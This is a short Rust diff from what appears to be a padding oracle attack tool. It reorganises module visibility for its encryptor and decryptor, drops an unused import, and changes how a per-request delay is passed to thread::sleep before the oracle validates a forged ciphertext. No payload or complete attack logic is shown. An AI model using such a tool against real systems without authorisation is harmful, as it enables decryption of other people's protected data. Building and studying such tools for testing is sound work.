@@ -1,7 +1,9 @@
+pub(super) mod decryptor;
+pub(super) mod encryptor;
+
 use std::{
     sync::{Arc, Mutex},
     thread,
-    time::Duration,
 };
 
 use anyhow::{anyhow, Result};
@@ -21,9 +23,6 @@ use crate::{
     other::{RETRY_DELAY_MS, RETRY_MAX_ATTEMPTS},
 };
 
-pub mod decryptor;
-pub mod encryptor;
-
 fn solve_block<'a, W, P>(
     oracle: &impl Oracle,
     cache: Arc<Mutex<Option<Cache>>>,
@@ -180,7 +179,7 @@ fn validate_while_handling_retries(
         ));
     }
 
-    thread::sleep(Duration::from_millis(oracle.thread_delay()));
+    thread::sleep(**oracle.thread_delay());
 
     match oracle.ask_validation(forged_cypher_text) {
         Ok(correct_padding) => OperationResult::Ok(correct_padding),
